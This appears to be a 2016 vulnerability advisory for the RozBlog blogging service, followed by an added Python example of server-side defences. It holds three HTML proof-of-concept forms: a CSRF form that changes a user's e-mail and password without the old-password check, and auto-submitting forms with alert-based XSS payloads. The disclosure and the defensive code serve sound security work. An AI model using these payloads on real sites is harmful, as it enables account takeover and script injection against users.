RozBlog Weblog Service Authentication Bypass / CSRF / CSS

Risk: Medium
Local: No
Remote: Yes

Document Title:
===============
RozBlog Weblog Service - Authentication Bypass / Cross Site Request Forgery / Cross Site Scripting

References (Source):
====================

Release Date:
=============
2016-02-23

Product & Service Introduction:
===============================
Roseblog is one of the most famous blogging services. It has many special features that give you an interesting blogging experience.

Vulnerability Type:
=========================
Authentication Bypass
Cross Site Request Forgery
Cross Site Scripting

Vulnerability Details:
==============================
I discovered an authentication bypass (change Email) vulnerability, a client-side cross site request forgery web vulnerability and a cross site scripting vulnerability in (Weblog Service).

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Proof of Concept (PoC):
=======================
-- Cross Site Request Forgery & Authentication Bypass --

-- PoC 1 --
-- To edit the e-mail, users must first enter the old password on another page, but this exploit no longer requires it and bypasses that step. --

<html>
<head>
<title>Authentication Bypass - Csrf</title>
</head>
<body>
<form action="" method="post">
<input type="text" name="email" value="" >
<input type="text" name="name" value="Ehsan">
<input type="text" name="age" value="10">
<input type="text" name="site" value="">
<input type="text" name="country" value="Country">
<input type="text" name="city" value="IRan">
<input type="text" name="about" value="About User">
<input type="text" name="yahoo" value="Yahoo Id">
<input type="text" name="password" value="123@abc">
<input type="submit" name="edit_profile" value="Attak">
</form>
</body>
</html>

-- PoC 2 --

<html>
<head>
<title>XSS - Csrf</title>
</head>
<body onload="document.contactfrm.submit()">
<form action="" name="contactfrm" method="post">
<input type="text" name="singer" value='"><img src=x onerror=alert(1)>'>
<input type="text" name="subject" value='"><img src=x onerror=alert(2)>'>
<input type="text" name="message" value='"></textarea><img src=x onerror=alert(3)>'>
</form>
</body>
</html>

-- PoC 3 --
-- Cross Site Scripting --
-- For the action attribute, enter the address of the weblog or one of the domains --

<html>
<head>
<title>Cross Site Scripting</title>
</head>
<body onload="">
<form action='' method='POST' name='info'>
<input name="c" id="c" value="2" type="hidden">
<input name='themecode' value="<script>alert('Ehsan')</script>">
</form>
</body>
</html>

Author:
==================
Ehsan Hosseini

SPX tnx to:
===========
Bl4ck_mohajem Alireza

Contact:
========
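The server-side checks whose absence the three PoCs rely on, as an added example (not RozBlog's code and not part of the advisory): an anti-CSRF token, a current-password check in the same request that changes the e-mail or password, and output encoding of stored fields. The profile field names follow the PoC 1 form; `csrf_token`, `current_password`, the session and user dictionaries and every function name are assumptions.

```python
import hashlib, hmac, html, secrets

# Field names taken from the PoC 1 form; everything else here is hypothetical.
PROFILE_FIELDS = {"email", "name", "age", "site", "country", "city", "about", "yahoo", "password"}
SENSITIVE = {"email", "password"}  # changes that require re-authentication

def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_user(password):
    # Constructed sample account.
    salt = secrets.token_bytes(16)
    return {"salt": salt, "pw_hash": hash_password(password, salt),
            "profile": {"email": "owner@example.test"}}

def new_session(user):
    # Per-session anti-CSRF token; the genuine form carries it in a hidden field.
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}

def handle_edit_profile(session, form):
    """Apply a profile edit from POST data `form`; return (ok, reason)."""
    # 1. A form hosted on another origin cannot read the token, so it fails here.
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return False, "csrf"
    user = session["user"]
    changes = {k: v for k, v in form.items() if k in PROFILE_FIELDS and v != ""}
    # 2. The old password is checked in the same request that changes the e-mail
    #    or password, not on a separate page that can be skipped.
    if SENSITIVE & changes.keys():
        supplied = hash_password(form.get("current_password", ""), user["salt"])
        if not hmac.compare_digest(supplied, user["pw_hash"]):
            return False, "reauth"
    if "password" in changes:
        user["salt"] = secrets.token_bytes(16)
        user["pw_hash"] = hash_password(changes.pop("password"), user["salt"])
    user["profile"].update(changes)
    return True, "ok"

def render_field(value):
    # 3. Encode on output so stored markup is shown as text instead of parsed.
    return html.escape(value, quote=True)
```

With these checks a cross-site POST shaped like PoC 1 is rejected with `csrf`, and the same fields sent with a valid token but no current password are rejected with `reauth`.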

